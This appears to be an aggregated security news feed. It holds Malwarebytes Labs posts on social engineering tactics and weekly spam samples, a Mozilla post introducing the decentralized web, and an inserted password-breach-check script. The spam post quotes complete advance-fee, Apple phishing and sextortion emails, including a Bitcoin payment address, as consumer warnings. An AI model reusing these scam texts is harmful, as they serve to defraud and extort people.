One of the major contributions of big data to our society will be through the Internet of Things (IoT). IoT represents the most direct link between the physical world and the cyber world we’ve experienced yet. These cyber-physical systems will of course be shaped by the objects and software we create for them, but their biggest influence will be the result of algorithms applied to the data they collect.

With the evolution of these systems, we can expect to evolve into a data-driven society, where big data plays a major role in adjusting production to meet our expected needs. This is an area where we will need safeguards in the future to prevent big data from turning into Big Brother.

Big data, big breaches

The obvious warning here is that gathering and manipulating big data require extra attention paid to security and privacy, especially when the data are worth stealing. While raw datasets may seem like a low-risk asset, those who know how to find the gold (cyber)coin in the pile of manure will see otherwise. With the advent of GDPR in May, any form of personally identifiable information (PII) will be sought after with great urgency, as the safeguards put in place to protect PII endanger the lively black market trade set up around it.

The lesson, then, is to take big data’s impact seriously, both for good and for evil. Perhaps the whole pile should be considered the treasure.

The post Explained: What is big data? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Social engineering attacks: What makes you susceptible?

Malwarebytes - Thu, 08/02/2018 - 15:00

We now live in a world where holding the door open for someone balancing a tray of steaming hot coffee—she can’t seem to get her access card out to place it near the reader—is something we need to think twice about. Courtesy isn’t dead, mind you, but in this case, you’d almost wish it were. Because the door opens to a restricted facility. Do you let her in? If she really can’t reach her card, the answer is clearly yes. But what if there’s something else going on?

Holding the door open for people in need of assistance is considered common courtesy. But when someone assumes the role of a distressed woman to count on your desire to help, your thoughtful gesture suddenly becomes a dangerous one. Now, you’ve just made it easier for someone to get into a restricted facility they otherwise had no access or right to. So what does that make you? A victim of social engineering.

Social engineering is a term you often hear IT pros and cybersecurity experts use when talking about Internet threats like phishing, scams, and even certain kinds of malware, such as ransomware. But its definition is even broader: social engineering is the manipulation of, or the taking advantage of, human qualities to serve an attacker’s purpose.

It is imperative, then, that we protect ourselves from such social engineering tactics the same way we protect our devices from malware. With due diligence, we can make it difficult for social engineers to get what they want.

Know thy vulnerable self

Before we go into the “how” of things, we’d like to lay out other human emotional and psychological aspects that a social engineer can use to their advantage (and the potential target’s disadvantage). These include emotions such as sympathy, which we already touched on above. Other traits open to exploitation are as follows:

Carelessness

The majority of us have accidentally clicked a link or two, or opened a suspicious email attachment. And depending on how quickly we were able to mitigate such an act, the damage done could range from minor to severe and life-changing.

Examples of social engineering attacks that take advantage of our carelessness include:

Curiosity

You seem to have received an email supposedly for someone else by accident, and it’s sitting in your inbox right now. Judging from the subject line, it’s a personal email containing photos from the sender’s recent trip to the Bahamas. The photos are in a ZIP-compressed file.

If at this point you start to debate with yourself on whether you should open the attachment or not, even if it wasn’t meant for you, then you may be susceptible to a curiosity-based social engineering attack. And we’ve seen a lot of users get duped by this approach.

Examples of curiosity-based attacks include:

Fear

According to Charles E. Lively, Jr. in the paper “Psychological-Based Social Engineering,” attacks that play on fear are usually the most aggressive form of social engineering because it pressures the target to the point of making them feel anxious, stressed, and frightened.

Such attacks make targets willing to do anything they’re asked to do, such as send money, intellectual property, or other information to the threat actor, who might be posing as a member of senior management or holding files hostage. Campaigns of this nature typically exaggerate the importance of the request and use a fictitious deadline. Attackers do this in the hopes of getting what they ask for before the deception is uncovered.

Examples of fear-based attacks include

Read: Fake Spectre and Meltdown patch pushes Smoke Loader malware

Desire

Whether for convenience, recognition, or reward, desire is a powerful psychological motivation that can affect one’s decision making, regardless of whether you’re seen as an intellectual or not. Blaise Pascal said it best: “The heart has its reasons which the mind knows nothing of.” People looking for the love of their lives, more money, or free iPhones are potentially susceptible to this type of attack.

Examples of desire-based attacks include:

  • Catfishing/romance fraud (members of the LGBTQ community aren’t exempt)
  • Catphishing
  • Certain phishing campaigns
  • Scams that bait you with money or gadgets (e.g. 419 or Nigerian Prince scams, survey scams)
  • Lottery and gambling-related scams
  • Quid pro quo

Doubt

This is often coupled with uncertainty. And while doubt can sometimes stop us from doing something we would have regretted, it can also be used by social engineers to blindside us with information that potentially casts something, someone, or an idea in a bad light. In turn, we may end up doubting people or things we know to be legitimate, and trusting the social engineer more.

One Internet user shared her experience with two fake AT&T associates who contacted her on the phone after she received an SMS report of changes to her account. She said that the first purported associate was clearly fake, getting defensive and hanging up on her when she questioned whether this was a scam. But the second associate gave her pause, as the caller was calm and kind, making her think twice about whether he was indeed a phony associate. Had she given in, she would have been successfully scammed.

Examples of doubt-based attacks include:

  • Apple iTunes scams
  • Payment-based scams
  • Payment diversion fraud
  • Some forms of social hacking, especially in social media

Empathy and sympathy

When calamities and natural disasters strike, one cannot help but feel the need to extend aid or relief. As most of us cannot possibly hop on a plane or chopper and race to affected areas to volunteer, it’s significantly easier to go online, enter your card details on a website receiving donations, and hit “Enter.” Of course, not all of those sites are real. Social engineers exploit the related emotions of empathy and sympathy, funneling funds away from those who are actually in need and into their own pockets.

Examples of sympathy-based scams include:

Read: Crowdsourced fraud and kickstarted scams

Ignorance or naiveté

This is probably the human trait most taken advantage of and, no doubt, one of the reasons why we say that cybersecurity education and awareness are not only useful but essential. Suffice to say, all of the social engineering examples we mention in this post rely in part on these two characteristics.

While ignorance is often used to describe someone who is rude or prejudiced, in this context it means someone who lacks knowledge or awareness—specifically of the fact that these forms of crime exist on the Internet. Naiveté also highlights users’ lack of understanding of how a certain technology or service works.

On the flip side, social engineers can also use ignorance to their advantage by playing dumb in order to get what they want, which is usually information or favors. This is highly effective, especially when used with flattery and the like.

Other examples of attacks that prey on ignorance include:

  • Venmo scams
  • Amazon gift card scams
  • Cryptocurrency scams

Inattentiveness or complacency

If we’re attentive enough to ALT+TAB away from what we’re looking at when someone walks in the room, theoretically we should be attentive enough to “go by the book” and check that person’s proof of identity. Sounds simple enough, and it surely is, yet many of us give people a pass if we feel that asking for confirmation gets in the way. Social engineers know this, of course, and use it to their advantage.

Examples of complacency-based attacks include:

  • Physical social engineering attempts, such as gaining physical access to restricted locations and dumpster diving
  • Pretexting
  • Diversion theft

Sophisticated threat actors behind noteworthy social engineering campaigns such as BEC and phishing use a combination of attacks, targeting two or more emotional and psychological traits and one or more people.

Whether the person you’re dealing with is online, on the phone, or face-to-face, it’s important to be on alert, especially when our level of skepticism hasn’t yet been tuned to detect social engineering attempts.

Brain gyming: combating social engineering

Thinking of ways to counter social engineering attempts can be a challenge. But many may not realize that basic cybersecurity hygiene can also be enough to deter social engineering tactics. We’ve touched on some of them in previous posts, but here, we’re adding more to your mental arsenal of prevention tips. Our only request is that you use them liberally when they apply to your circumstances.

Email
  • If an email bears a dubious link or attachment, reach out to the sender (in person or via other means of communication) and verify that they indeed sent it. You can also do this with banks and other services you use when you receive an email reporting that something happened with your account.
  • Received a request from your boss to wire money to him ASAP? Don’t feel pressured. Instead, give him a call to verify if he sent that request. It would also be nice to confirm that you are indeed talking with your boss and not someone impersonating him/her.

Phone (landline or smartphone)
  • When you receive a potentially scammy SMS from your service provider, call them directly instead of replying via text and ask if something’s up.
  • Refrain from answering calls not in your contact list and other numbers you don’t recognize, especially if they appear closely related to your own phone number. (Scammers like to spoof area codes and the first three digits of your phone to trick you into believing it’s from someone you know.)
  • Avoid giving out information to anyone directly or indirectly. Remind yourself that volunteering what you know is what the social engineers are heavily counting on.
  • Apply the DTA (Don’t Trust Anyone) or the Zero Trust rule. This means you treat every unsolicited call as a scam and ask tough questions. Throw the caller off by providing false information.
  • If something doesn’t feel right, hang up, and look for information online about the nature of the call you just received. Someone somewhere may have already experienced it and posted about it.

In person
  • Be wary when someone you just met touches you. In the US, touch is common among friends and family members, not with people you don’t know or barely know.
  • If you notice someone matching your quirks or tendencies, be suspicious of their motives.
  • Never give or blurt out information like names, department names, and other information known only within your company when in the common area of your office building. Remind yourself that in your current location, it is easy to eavesdrop and to be eavesdropped on. Mingle with other employees from different companies if you like, but be picky and be as vague as possible with what you share. It also pays to apply the same cautious principle when out in public with friends in a bar, club, or restaurant.
  • Always check for identification and/or other relevant papers to identify persons and verify their purpose for being there.

Social media
  • Refrain from filling in surveys or playing games that require you to log in using a social media account. Many phishing attempts come in these forms, too.
  • If you frequent hashtagged conversations (on Twitter, for example), consider not clicking links from those who are sharing, as you have no idea whether the links take you to destinations you want. More importantly, we’re not even sure if those sharing the link are actual people and not bots created to go after the low hanging fruit.
  • If you receive a private message on your social network inbox—say on LinkedIn—with a link to a job offer, it’s best to visit the company’s official website and look up open positions there. If you have clicked the link and the site asks you to fill in your details, close the tab.

A happy smart ending

When it comes to social engineering, no incident is too small to take seriously. There is no harm in erring on the side of safety.

So, what should you do if someone is behind you carrying a tray of hot coffee and can’t get to her access card? Don’t open the door for her. Instead, you can offer to hold her tray while she takes out and uses her access card. If you still think this is a bad idea, then tell her to wait while you go inside and get security to help her out. Of course, this is assuming that security, HR, and the front desk have already been trained to respond forcefully against someone trying to social engineer their way in.

Good luck!

The post Social engineering attacks: What makes you susceptible? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

What’s in the spam mailbox this week?

Malwarebytes - Tue, 07/31/2018 - 15:00

We’ve seen a fair few spam emails in circulation this week, ranging from phishing to money muling to sexploitation. Shall we take a look?

The FBI wants to give you back your money

First out of the gate, we have a missive claiming to be from the FBI. Turns out you lost a huge sum of money that you somehow don’t have any recollection of, and now the FBI wants to give it back to you via Western Union.

Sounds 100 percent legit, right? Here’s the email. See what you think:

Attn: Beneficiary

After proper and several investigations and research at Western
Union and Money Gram Office, we found your name in Western Union
database among those that have sent money through Western Union
and this proves that you have truly been swindled by those
unscrupulous persons by sending money to them through Western
Union/Money Gram in the course of getting one fund or the other
that is not real.

In this regard a meeting was held between the Board of Directors
of WESTERN UNION, MONEYGRAM, the FBI alongside with the Ministry
of Finance, As a consequence of our investigations it was agreed
that the sum of One Million Five Hundred Thousand United States
Dollars (U.S.1,500,000.00) should be transferred to you out from
the funds that The United States Department of the Treasury has
set aside as compensation payment for scam victims.

This case would be handled and supervised by the FBI. We have
submitted your details to them so that your funds can be
transferred to you. Contact the Western Union agent office
through the information below:

Contact Person: Graham Collins
Address: Western Union Post Office, California
Email: westernunionofficemail0012@[redacted]

Yours sincerely,
Christopher A. Wray
FBI Director

Sadly, the FBI is not going to discover you’re owed millions of dollars and then send you off to deal with a Western Union rep to reclaim it. Additionally, a quick search on multiple portions of the text will reveal parts of the above message dating back many years. It’s a common scam tactic to lazily grab whatever text is available and reword it a little bit for a fresh sheen. For example, here’s one from 2013 that came with a malicious executable attachment.

This one has no such nasties lurking, but someone could still be at risk of falling into a money mule scam, or losing a ton of cash from getting involved. The good news is that ancient text reuse tends to send up the spam filter flags for most email clients, so if you do come across this, there’s a good chance it’ll be stuffed inside your spam bin where it belongs. If it’s in there, hammer the delete button and forget about it.

Let’s go Apple phishing

Next up, a pair of Apple phishes:

Click to enlarge

The first links to a site that’s currently offline, but does try to bait potential victims with a fake transaction for a set of $299 headphones:

Click to enlarge

As with most of these scams, they’re hoping you’ll see the amount supposedly paid, then run to the linked site and fill in the phishing form.

The text from the second one reads as follows:

Your Apple ID has been Locked
This Apple ID [EMAIL ADDRESS] has been locked for security reasons.

It looks like your account is outdated and requires updated account ownership information so we can protect your account and improve our services to maintain your privacy.

To continue using the Apple ID service, we advise you to update the information about your account ownership.

Update Account Apple ID
For the security of your account, we advise not to notify your account password to anyone. If you have problems updating your account, please visit Apple Support.

A clickable link leads to the below phishing site located at appelid(dot)idnotice(dot)info-account-update-limiteds(dot)com:

Click to enlarge

Upon entering a username and password, the site claims the account has been locked and needs to be set back to full health.

Click to enlarge

Potential victims are directed to a page asking for name, address, DOB, payment information, and a variety of selectable security questions.

Click to enlarge

We don’t want anybody handing over personal information to scam mails such as the above, much less any fake login portals further down the chain. Always be cautious when seeing wild claims of payments and mysterious orders you have no recollection of; the name of the game is not so much panic buying as panic clicking, and that can lead to only one thing: hours spent dealing with the customer support section of shopping portals or your bank.

Sexploitation, Bitcoin, and old passwords

Speaking of mysterious behavior you have no recollection of participating in, a recent, massive phishing email first hooks users by divulging a real, former password of theirs in the subject line, and then tells said recipients they’ve been caught on camera looking at porn and, um, doing other stuff.

Now, the drop of a password, even an old one, is enough to get many readers to raise a brow and open the email. Once opened, though, one of two things can happen. Those who haven’t viewed porn on their computer can breathe a sigh of relief. For the millions of others who have, however, a little panic might ensue, especially when the scammers ask for $7,000 in Bitcoin for hush money.

The email reads as follows:

I am well aware [redacted] is your password. Lets get directly to purpose. You don’t know me and you are probably thinking why you’re getting this email? Not a single person has compensated me to check you.

Let me tell you, I setup a malware on the xxx videos (porn material) web-site and you know what, you visited this website to experience fun (you know what I mean). When you were watching video clips, your web browser began functioning as a RDP that has a key logger which provided me with accessibility to your display as well as web cam. Right after that, my software collected all of your contacts from your Messenger, Facebook, as well as emailaccount. After that I made a double video. First part displays the video you were watching (you’ve got a good taste rofl), and next part displays the view of your webcam, & its you.

You actually have two different possibilities. Shall we review each one of these solutions in aspects:

Very first option is to just ignore this email. In such a case, I will send out your actual recorded material to every bit of your personal contacts and thus think about regarding the embarrassment you will see. In addition if you are in a romantic relationship, how it would affect?

2nd solution is to give me $7000. I will call it a donation. Then, I most certainly will straightaway discard your video footage. You will continue on with your way of life like this never occurred and you will not ever hear back again from me.

You’ll make the payment by Bitcoin (if you do not know this, search “how to buy bitcoin” in Google).

BTC Address: 14Fg5D24cxseFXQXv89PJCHmsTM74iGyDb

[CASE-SENSITIVE copy and paste it]

If you may be wondering about going to the authorities, good, this email can not be traced back to me. I have covered my actions. I am just not attempting to charge you very much, I only want to be compensated. I’ve a special pixel within this email, and now I know that you have read this e mail. You have one day to pay. If I do not get the BitCoins, I will definitely send out your video recording to all of your contacts including friends and family, colleagues, and many others. Nevertheless, if I do get paid, I’ll destroy the recording right away. It’s a non-negotiable offer, thus don’t waste mine time and yours by responding to this message. If you want to have evidence, reply with Yup! and I definitely will send your video to your 9 contacts.

This sextortion scam has been around for quite a while; the new twist is the use of real passwords. According to Krebs on Security, the scammers likely collected these passwords and emails from a data dump possibly dating back 10 years or more. Our own Malwarebytes researchers have been scouring various data dumps looking for the source of the breach, but so far have not found the smoking gun. The problem is that most users’ credentials have been swiped in one breach or another, if not multiple—if not dozens! So it’s difficult to triangulate and trace back to a single source.
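
If you want to check whether one of your own passwords has surfaced in these public dumps, the Pwned Passwords range API (a third-party service, not mentioned in the original post) lets you do so without sending the full password anywhere; only the first five characters of its SHA-1 hash leave your machine. A minimal sketch in Node.js:

// pwned-check.js -- sketch: k-anonymity lookup against the Pwned Passwords range API
const crypto = require('crypto');
const https = require('https');

const password = process.argv[2]; // usage: node pwned-check.js <password>
const sha1 = crypto.createHash('sha1').update(password).digest('hex').toUpperCase();
const prefix = sha1.slice(0, 5); // only these five characters are ever sent over the wire
const suffix = sha1.slice(5);

https.get(`https://api.pwnedpasswords.com/range/${prefix}`, (res) => {
  let body = '';
  res.on('data', (chunk) => (body += chunk));
  res.on('end', () => {
    const hit = body.split('\n').find((line) => line.startsWith(suffix));
    console.log(
      hit
        ? `Seen in breaches ${hit.split(':')[1].trim()} times -- change it everywhere you use it.`
        : 'Not found in known dumps (still, use unique passwords and a password manager).'
    );
  });
});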

The good news is, if you received one of these emails, you need only flag it as spam and delete it. And if you’re suddenly worried about someone being able to see your nocturnal activities, you can buy a webcam cover for between US$5 and $10.

The post What’s in the spam mailbox this week? appeared first on Malwarebytes Labs.

Categories: Techie Feeds

Introducing the Dweb

Mozilla Hacks - Tue, 07/31/2018 - 14:00

The web is the most successful programming platform in history, resulting in the largest open and accessible collection of human knowledge ever created. So yeah, it’s pretty great. But there are a set of common problems that the web is not able to address.

Have you ever…

  • Had a website or app you love get updated to a new version, and you wished to go back to the old version?
  • Tried to share a file between your phone and laptop, TV, or other device while not connected to the internet? And without using a cloud service?
  • Gone to a website or service that you depend on, only to find it’s been shut down? Whether it got bought and enveloped by some internet giant, or has gone out of business, or whatever, it was critical for you and now it’s gone.

Additionally, the web is facing critical internet health issues, seemingly intractable due to the centralization of power in the hands of a few large companies who have economic interests in not solving these problems:

  • Hate speech, harassment and other attacks on social networks
  • Repeated attacks on Net Neutrality by governments and corporations
  • Mass human communications compromised and manipulated for profit or political gain
  • Censorship and whole internet shutdowns by governments

These are some of the problems and use-cases addressed by a new wave of projects, products and platforms building on or with web technologies but with a twist: They’re using decentralized or distributed network architectures instead of the centralized networks we use now, in order to let the users control their online experience without intermediaries, whether government or corporate. This new structural approach gives rise to the idea of a ‘decentralized web’, often conveniently shortened to ‘dweb’.

You can read a number of perspectives on centralization, and why it’s an important issue for us to tackle, in Mozilla’s Internet Health Report, released earlier this year.

What’s the “D” in Dweb?!

The “d” in “dweb” usually stands for either decentralized or distributed.
What is the difference between distributed vs decentralized architectures? Here’s a visual illustration:


(Image credit: Openclipart.org, your best source for technical clip art with animals)

In centralized systems, one entity has control over the participation of all other entities. In decentralized systems, power over participation is divided between more than one entity. In distributed systems, no one entity has control over the participation of any other entity.

Examples of centralization on the web today are the domain name system (DNS), servers run by a single company, and social networks designed for controlled communication.

A few examples of decentralized or distributed projects that became household names are Napster, BitTorrent and Bitcoin.

Some of these new dweb projects are decentralizing identity and social networking. Some are building distributed services in or on top of the existing centralized web, and others are distributed application protocols or platforms that run the web stack (HTML, JavaScript and CSS) on something other than HTTP. Also, there are blockchain-based platforms that run anything as long as it can be compiled into WebAssembly.

Here We Go

Mozilla’s mission is to put users in control of their experiences online. While some of these projects and technologies turn the familiar on its head (no servers! no DNS! no HTTP(S)!), it’s important for us to explore their potential for empowerment.

This is the first post in a series. We’ll introduce projects that cover social communication, online identity, file sharing, new economic models, as well as high-level application platforms. All of this work is either decentralized or distributed, minimizing or entirely removing centralized control.

You’ll meet the people behind these projects, and learn about their values and goals, the technical architectures used, and see basic code examples of using the project or platform.

So leave your assumptions at the door, and get ready to learn what a web more fully in users’ control could look like.

Note: This post is the introduction. The following posts in the series are listed below.

The post Introducing the Dweb appeared first on Mozilla Hacks - the Web developer blog.

Categories: Techie Feeds

A week in security (July 23 – July 29)

Malwarebytes - Mon, 07/30/2018 - 15:57

Last week on Labs, we looked at an adware called MobiDash getting stealthy, a new strain of Mac malware called Proton that was found after two years, and the ‘Hidden Bee’ miner that was delivered via an improved drive-by download toolkit. We also delved into the security improvements expected in the new Android P, and had a fresh look at Trojans to help users define what they really are.

We also gave you a quick introduction to the Malwarebytes Browser Extensions for Chrome and Firefox.

Other news:
  • Russian hackers reached US utility control rooms, Homeland Security officials say. (Source: The Wall Street Journal)
  • Dozens were sentenced for a call center scam, where victims bought iTunes gift cards under threat of arrest. (Source: Gizmodo)
  • Guardian US finds that 72 percent of video spend is fraudulent without Ads.txt. (Source: Mediapost)
  • No, you shouldn’t use the new version of Stylish. (Source: Robert Heaton)
  • These are 2018’s biggest hacks, leaks, and data breaches so far. (Source: ZDNet)
  • Google Translate is doing something incredibly sinister and it looks like we’re all doomed. (Source: IFLScience)
  • The Death botnet targets AVTech devices with a 2-year-old exploit. (Source: Security Affairs)
  • Long Beach Port terminal hit by ransomware attack. (Source: Press Telegram)
  • State governments warned of malware-laden CD sent via snail mail from China. (Source: Krebs on Security)
  • 23andMe sold access to your DNA library to big pharma, but you can opt out. (Source: MotherBoard)
  • Fake websites for Keepass, 7Zip, Audacity, and others found pushing adware. (Source: BleepingComputer)

Stay safe, everyone!

The post A week in security (July 23 – July 29) appeared first on Malwarebytes Labs.

Categories: Techie Feeds
